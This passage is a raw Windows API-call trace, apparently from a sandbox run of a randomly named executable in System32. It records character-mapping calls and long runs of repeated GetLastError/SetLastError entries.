¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x30f114 | out: lpCharType=0x30f114) returned 1 [0035.414] GetLastError () returned 0x0 [0035.414] SetLastError (dwErrCode=0x0) [0035.414] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0035.414] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f514, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.414] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f514, cbMultiByte=256, lpWideCharStr=0x30ee48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ击矲狰Ā") returned 256 [0035.414] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ击矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0035.414] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ击矲狰Ā", cchSrc=256, lpDestStr=0x30ec38, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.414] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x30f414, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ>RpôLö0", lpUsedDefaultChar=0x0) returned 256 [0035.414] GetLastError () returned 0x0 [0035.414] SetLastError (dwErrCode=0x0) [0035.414] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f514, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.414] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f514, cbMultiByte=256, lpWideCharStr=0x30ee68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ击矲狰Ā") returned 256 [0035.414] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ击矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0035.414] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ击矲狰Ā", cchSrc=256, lpDestStr=0x30ec58, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0035.414] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x30f314, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ>RpôLö0", lpUsedDefaultChar=0x0) returned 256 [0035.414] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.414] GetLastError () returned 0x0 [0035.414] SetLastError (dwErrCode=0x0) [0035.414] GetLastError () returned 0x0 [0035.414] SetLastError (dwErrCode=0x0) [0035.414] GetLastError () returned 0x0 [0035.414] SetLastError (dwErrCode=0x0) [0035.414] GetLastError () returned 0x0 [0035.414] SetLastError (dwErrCode=0x0) [0035.414] GetLastError () returned 0x0 [0035.414] SetLastError (dwErrCode=0x0) [0035.414] GetLastError () returned 0x0 [0035.414] SetLastError (dwErrCode=0x0) [0035.414] GetLastError () returned 0x0 [0035.415] SetLastError (dwErrCode=0x0) [0035.415] GetLastError () returned 0x0 [0035.415] SetLastError (dwErrCode=0x0) [0035.415] GetLastError () returned 0x0 [0035.415] SetLastError (dwErrCode=0x0) [0035.415] GetLastError () returned 0x0 [0035.415] SetLastError (dwErrCode=0x0) [0035.415] GetLastError () returned 0x0 [0035.415] SetLastError (dwErrCode=0x0) [0035.415] GetLastError () returned 0x0 [0035.415] SetLastError (dwErrCode=0x0) [0035.415] GetLastError () returned 0x0 [0035.415] SetLastError (dwErrCode=0x0) [0035.415] GetLastError () returned 0x0 [0035.415] SetLastError (dwErrCode=0x0) [0035.415] GetLastError () returned 0x0 [0035.415] SetLastError (dwErrCode=0x0) [0035.415] GetLastError () returned 0x0 [0035.415] SetLastError (dwErrCode=0x0) [0035.415] GetLastError () returned 0x0 [0035.415] SetLastError (dwErrCode=0x0) [0035.415] GetLastError () returned 0x0 [0035.415] SetLastError (dwErrCode=0x0) [0035.415] GetLastError () returned 0x0 [0035.415] SetLastError (dwErrCode=0x0) [0035.415] GetLastError () returned 0x0 [0035.415] SetLastError (dwErrCode=0x0) [0035.415] GetLastError () returned 0x0 [0035.415] SetLastError (dwErrCode=0x0) [0035.415] GetLastError () returned 0x0 [0035.415] SetLastError (dwErrCode=0x0) [0035.415] GetLastError () returned 0x0 [0035.415] SetLastError (dwErrCode=0x0) [0035.415] GetLastError () returned 0x0 [0035.416] SetLastError (dwErrCode=0x0) [0035.416] GetLastError () returned 0x0 [0035.416] SetLastError (dwErrCode=0x0) [0035.416] GetLastError () returned 0x0 [0035.416] SetLastError (dwErrCode=0x0) [0035.416] GetLastError () returned 0x0 [0035.416] SetLastError (dwErrCode=0x0) [0035.416] GetLastError () returned 0x0 [0035.416] SetLastError (dwErrCode=0x0) [0035.416] GetLastError () returned 0x0 [0035.416] SetLastError (dwErrCode=0x0) [0035.416] GetLastError () returned 0x0 [0035.416] SetLastError (dwErrCode=0x0) [0035.416] GetLastError () returned 0x0 [0035.416] SetLastError (dwErrCode=0x0) [0035.416] GetLastError () returned 0x0 [0035.416] SetLastError (dwErrCode=0x0) [0035.416] GetLastError () returned 0x0 [0035.416] SetLastError (dwErrCode=0x0) [0035.416] GetLastError () returned 0x0 [0035.416] SetLastError (dwErrCode=0x0) [0035.416] GetLastError () returned 0x0 [0035.416] SetLastError (dwErrCode=0x0) [0035.416] GetLastError () returned 0x0 [0035.416] SetLastError (dwErrCode=0x0) [0035.416] GetLastError () returned 0x0 [0035.416] SetLastError (dwErrCode=0x0) [0035.416] GetLastError () returned 0x0 [0035.416] SetLastError (dwErrCode=0x0) [0035.416] GetLastError () returned 0x0 [0035.416] SetLastError (dwErrCode=0x0) [0035.416] GetLastError () returned 0x0 [0035.416] SetLastError (dwErrCode=0x0) [0035.416] GetLastError () returned 0x0 [0035.416] SetLastError (dwErrCode=0x0) [0035.417] GetLastError () returned 0x0 [0035.417] SetLastError (dwErrCode=0x0) [0035.417] GetLastError () returned 0x0 [0035.417] SetLastError (dwErrCode=0x0) [0035.417] GetLastError () returned 0x0 [0035.417] SetLastError (dwErrCode=0x0) [0035.417] GetLastError () returned 0x0 [0035.417] SetLastError (dwErrCode=0x0) [0035.417] GetLastError () returned 0x0 [0035.417] SetLastError (dwErrCode=0x0) [0035.417] GetLastError () returned 0x0 [0035.417] SetLastError (dwErrCode=0x0) [0035.417] GetLastError () returned 0x0 [0035.417] SetLastError (dwErrCode=0x0) [0035.417] GetLastError () returned 0x0 [0035.417] SetLastError (dwErrCode=0x0) [0035.417] GetLastError () returned 0x0 [0035.417] SetLastError (dwErrCode=0x0) [0035.417] GetLastError () returned 0x0 [0035.417] SetLastError (dwErrCode=0x0) [0035.417] GetLastError () returned 0x0 [0035.417] SetLastError (dwErrCode=0x0) [0035.417] GetLastError () returned 0x0 [0035.417] SetLastError (dwErrCode=0x0) [0035.417] GetLastError () returned 0x0 [0035.417] SetLastError (dwErrCode=0x0) [0035.417] GetLastError () returned 0x0 [0035.417] SetLastError (dwErrCode=0x0) [0035.417] GetLastError () returned 0x0 [0035.417] SetLastError (dwErrCode=0x0) [0035.417] GetLastError () returned 0x0 [0035.417] SetLastError (dwErrCode=0x0) [0035.417] GetLastError () returned 0x0 [0035.417] SetLastError (dwErrCode=0x0) [0035.417] GetLastError () returned 0x0 [0035.418] SetLastError (dwErrCode=0x0) [0035.418] GetLastError () returned 0x0 [0035.418] SetLastError (dwErrCode=0x0) [0035.418] GetLastError () returned 0x0 [0035.418] SetLastError (dwErrCode=0x0) [0035.418] GetLastError () returned 0x0 [0035.418] SetLastError (dwErrCode=0x0) [0035.418] GetLastError () returned 0x0 [0035.418] SetLastError (dwErrCode=0x0) [0035.418] GetLastError () returned 0x0 [0035.418] SetLastError (dwErrCode=0x0) [0035.418] GetLastError () returned 0x0 [0035.418] SetLastError (dwErrCode=0x0) [0035.418] GetLastError () returned 0x0 [0035.418] SetLastError (dwErrCode=0x0) [0035.418] GetLastError () returned 0x0 [0035.418] SetLastError (dwErrCode=0x0) [0035.418] GetLastError () returned 0x0 [0035.418] SetLastError (dwErrCode=0x0) [0035.418] GetLastError () returned 0x0 [0035.418] SetLastError (dwErrCode=0x0) [0035.418] GetLastError () returned 0x0 [0035.418] SetLastError (dwErrCode=0x0) [0035.418] GetLastError () returned 0x0 [0035.418] SetLastError (dwErrCode=0x0) [0035.418] GetLastError () returned 0x0 [0035.418] SetLastError (dwErrCode=0x0) [0035.418] GetLastError () returned 0x0 [0035.418] SetLastError (dwErrCode=0x0) [0035.418] GetLastError () returned 0x0 [0035.418] SetLastError (dwErrCode=0x0) [0035.418] GetLastError () returned 0x0 [0035.418] SetLastError (dwErrCode=0x0) [0035.418] GetLastError () returned 0x0 [0035.419] SetLastError (dwErrCode=0x0) [0035.419] GetLastError () returned 0x0 [0035.419] SetLastError (dwErrCode=0x0) [0035.419] GetLastError () returned 0x0 [0035.419] SetLastError (dwErrCode=0x0) [0035.419] GetLastError () returned 0x0 [0035.419] SetLastError (dwErrCode=0x0) [0035.419] GetLastError () returned 0x0 [0035.419] SetLastError (dwErrCode=0x0) [0035.419] GetLastError () returned 0x0 [0035.419] SetLastError (dwErrCode=0x0) [0035.419] GetLastError () returned 0x0 [0035.419] SetLastError (dwErrCode=0x0) [0035.419] GetLastError () returned 0x0 [0035.419] SetLastError (dwErrCode=0x0) [0035.419] GetLastError () returned 0x0 [0035.419] SetLastError (dwErrCode=0x0) [0035.419] GetLastError () returned 0x0 [0035.419] SetLastError (dwErrCode=0x0) [0035.419] GetLastError () returned 0x0 [0035.419] SetLastError (dwErrCode=0x0) [0035.419] GetLastError () returned 0x0 [0035.419] SetLastError (dwErrCode=0x0) [0035.419] GetLastError () returned 0x0 [0035.419] SetLastError (dwErrCode=0x0) [0035.419] GetLastError () returned 0x0 [0035.419] SetLastError (dwErrCode=0x0) [0035.419] GetLastError () returned 0x0 [0035.419] SetLastError (dwErrCode=0x0) [0035.419] GetLastError () returned 0x0 [0035.419] SetLastError (dwErrCode=0x0) [0035.419] GetLastError () returned 0x0 [0035.419] SetLastError (dwErrCode=0x0) [0035.419] GetLastError () returned 0x0 [0035.420] SetLastError (dwErrCode=0x0) [0035.420] GetLastError () returned 0x0 [0035.420] SetLastError (dwErrCode=0x0) [0035.420] GetLastError () returned 0x0 [0035.420] SetLastError (dwErrCode=0x0) [0035.420] GetLastError () returned 0x0 [0035.420] SetLastError (dwErrCode=0x0) [0035.420] GetLastError () returned 0x0 [0035.420] SetLastError (dwErrCode=0x0) [0035.420] GetLastError () returned 0x0 [0035.420] SetLastError (dwErrCode=0x0) [0035.420] GetLastError () returned 0x0 [0035.420] SetLastError (dwErrCode=0x0) [0035.420] GetLastError () returned 0x0 [0035.420] SetLastError (dwErrCode=0x0) [0035.420] GetLastError () returned 0x0 [0035.420] SetLastError (dwErrCode=0x0) [0035.420] GetLastError () returned 0x0 [0035.420] SetLastError (dwErrCode=0x0) [0035.420] GetLastError () returned 0x0 [0035.420] SetLastError (dwErrCode=0x0) [0035.420] GetLastError () returned 0x0 [0035.420] SetLastError (dwErrCode=0x0) [0035.420] GetLastError () returned 0x0 [0035.420] SetLastError (dwErrCode=0x0) [0035.420] GetLastError () returned 0x0 [0035.420] SetLastError (dwErrCode=0x0) [0035.420] GetLastError () returned 0x0 [0035.420] SetLastError (dwErrCode=0x0) [0035.420] GetLastError () returned 0x0 [0035.420] SetLastError (dwErrCode=0x0) [0035.420] GetLastError () returned 0x0 [0035.420] SetLastError (dwErrCode=0x0) [0035.420] GetLastError () returned 0x0 [0035.421] SetLastError (dwErrCode=0x0) [0035.421] GetLastError () returned 0x0 [0035.421] SetLastError (dwErrCode=0x0) [0035.421] GetLastError () returned 0x0 [0035.421] SetLastError (dwErrCode=0x0) [0035.421] GetLastError () returned 0x0 [0035.421] SetLastError (dwErrCode=0x0) [0035.421] GetLastError () returned 0x0 [0035.421] SetLastError (dwErrCode=0x0) [0035.421] GetLastError () returned 0x0 [0035.421] SetLastError (dwErrCode=0x0) [0035.421] GetLastError () returned 0x0 [0035.421] SetLastError (dwErrCode=0x0) [0035.421] GetLastError () returned 0x0 [0035.421] SetLastError (dwErrCode=0x0) [0035.421] GetLastError () returned 0x0 [0035.421] SetLastError (dwErrCode=0x0) [0035.421] GetLastError () returned 0x0 [0035.421] SetLastError (dwErrCode=0x0) [0035.421] GetLastError () returned 0x0 [0035.421] SetLastError (dwErrCode=0x0) [0035.421] GetLastError () returned 0x0 [0035.421] SetLastError (dwErrCode=0x0) [0035.421] GetLastError () returned 0x0 [0035.421] SetLastError (dwErrCode=0x0) [0035.421] GetLastError () returned 0x0 [0035.421] SetLastError (dwErrCode=0x0) [0035.421] GetLastError () returned 0x0 [0035.421] SetLastError (dwErrCode=0x0) [0035.421] GetLastError () returned 0x0 [0035.421] SetLastError (dwErrCode=0x0) [0035.421] GetLastError () returned 0x0 [0035.421] SetLastError (dwErrCode=0x0) [0035.421] GetLastError () returned 0x0 [0035.422] SetLastError (dwErrCode=0x0) [0035.422] GetLastError () returned 0x0 [0035.422] SetLastError (dwErrCode=0x0) [0035.422] GetLastError () returned 0x0 [0035.422] SetLastError (dwErrCode=0x0) [0035.422] GetLastError () returned 0x0 [0035.422] SetLastError (dwErrCode=0x0) [0035.422] GetLastError () returned 0x0 [0035.422] SetLastError (dwErrCode=0x0) [0035.422] GetLastError () returned 0x0 [0035.422] SetLastError (dwErrCode=0x0) [0035.422] GetLastError () returned 0x0 [0035.422] SetLastError (dwErrCode=0x0) [0035.422] GetLastError () returned 0x0 [0035.422] SetLastError (dwErrCode=0x0) [0035.422] GetLastError () returned 0x0 [0035.422] SetLastError (dwErrCode=0x0) [0035.422] GetLastError () returned 0x0 [0035.422] SetLastError (dwErrCode=0x0) [0035.422] GetLastError () returned 0x0 [0035.422] SetLastError (dwErrCode=0x0) [0035.422] GetLastError () returned 0x0 [0035.422] SetLastError (dwErrCode=0x0) [0035.422] GetLastError () returned 0x0 [0035.422] SetLastError (dwErrCode=0x0) [0035.422] GetLastError () returned 0x0 [0035.422] SetLastError (dwErrCode=0x0) [0035.422] GetLastError () returned 0x0 [0035.423] SetLastError (dwErrCode=0x0) [0035.423] GetLastError () returned 0x0 [0035.423] SetLastError (dwErrCode=0x0) [0035.423] GetLastError () returned 0x0 [0035.423] SetLastError (dwErrCode=0x0) [0035.423] GetLastError () returned 0x0 [0035.423] SetLastError (dwErrCode=0x0) [0035.423] GetLastError () returned 0x0 [0035.423] SetLastError (dwErrCode=0x0) [0035.423] GetLastError () returned 0x0 [0035.423] SetLastError (dwErrCode=0x0) [0035.423] GetLastError () returned 0x0 [0035.423] SetLastError (dwErrCode=0x0) [0035.423] GetLastError () returned 0x0 [0035.423] SetLastError (dwErrCode=0x0) [0035.423] GetLastError () returned 0x0 [0035.423] SetLastError (dwErrCode=0x0) [0035.423] GetLastError () returned 0x0 [0035.423] SetLastError (dwErrCode=0x0) [0035.423] GetLastError () returned 0x0 [0035.423] SetLastError (dwErrCode=0x0) [0035.423] GetLastError () returned 0x0 [0035.423] SetLastError (dwErrCode=0x0) [0035.423] GetLastError () returned 0x0 [0035.423] SetLastError (dwErrCode=0x0) [0035.423] GetLastError () returned 0x0 [0035.423] SetLastError (dwErrCode=0x0) [0035.423] GetLastError () returned 0x0 [0035.423] SetLastError (dwErrCode=0x0) [0035.423] GetLastError () returned 0x0 [0035.423] SetLastError (dwErrCode=0x0) [0035.423] GetLastError () returned 0x0 [0035.423] SetLastError (dwErrCode=0x0) [0035.423] GetLastError () returned 0x0 [0035.424] SetLastError (dwErrCode=0x0) [0035.424] GetLastError () returned 0x0 [0035.424] SetLastError (dwErrCode=0x0) [0035.424] GetLastError () returned 0x0 [0035.424] SetLastError (dwErrCode=0x0) [0035.424] GetLastError () returned 0x0 [0035.424] SetLastError (dwErrCode=0x0) [0035.424] GetLastError () returned 0x0 [0035.424] SetLastError (dwErrCode=0x0) [0035.424] GetLastError () returned 0x0 [0035.424] SetLastError (dwErrCode=0x0) [0035.424] GetLastError () returned 0x0 [0035.424] SetLastError (dwErrCode=0x0) [0035.424] GetLastError () returned 0x0 [0035.424] SetLastError (dwErrCode=0x0) [0035.424] GetLastError () returned 0x0 [0035.424] SetLastError (dwErrCode=0x0) [0035.424] GetLastError () returned 0x0 [0035.424] SetLastError (dwErrCode=0x0) [0035.424] GetLastError () returned 0x0 [0035.424] SetLastError (dwErrCode=0x0) [0035.424] GetLastError () returned 0x0 [0035.424] SetLastError (dwErrCode=0x0) [0035.424] GetLastError () returned 0x0 [0035.424] SetLastError (dwErrCode=0x0) [0035.424] GetLastError () returned 0x0 [0035.424] SetLastError (dwErrCode=0x0) [0035.424] GetLastError () returned 0x0 [0035.424] SetLastError 